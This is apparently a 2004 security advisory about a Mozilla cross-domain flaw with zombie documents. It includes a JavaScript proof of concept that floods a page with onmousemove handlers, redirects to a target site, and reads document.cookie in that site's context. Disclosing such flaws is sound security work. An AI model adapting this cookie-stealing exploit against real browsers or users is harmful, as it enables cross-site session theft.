Cross-domain Exploit on Zombie Document with Event Handlers (nsDOMClassInfo)
26 Feb. 2004
Summary
Mozilla web browser has a vulnerability that allows an attacker linking to a new page to still interact with the old page before the new page has been successfully loaded (zombie document). Any JavaScript events fired will be invoked in the context of the new page, making cross site scripting possible if the pages belong to different domains.
Mozilla has several security layers to prevent exploitation of zombie documents. Most important the origin of all JavaScript code is checked before execution. The problem occurs with event handlers used in tags. Some attempts are made to disable them, but can easily be bypassed.
The trick is to fill the current document with as many event handlers as possible and then redirect to a new page. If the event handler is invoked at the right time it will be executed in the context of the new page, thus making cross site scripting possible.
// Write out a lot of onmousemove events
var block = true;
for (i = 0; i < 100; i++)
document.write('< table width=100% height=1 border=0>< tr>'
+'< td onmousemove="try {block;} catch(e) {'+payload+';payload();}">'
+'< spacer type=block height=1></</td></tr></table>');
document.close();
// Called first time mouse is moved over document
function trigger() {
document.onmousemove = null;
location = target;
}
document.onmousemove = trigger;
// If block not definied then call payload
function payload() {
try {
block;
} catch(e) {
document.body.innerHTML=document.cookie;
alert(document.cookie);
}
}
</script>
foo
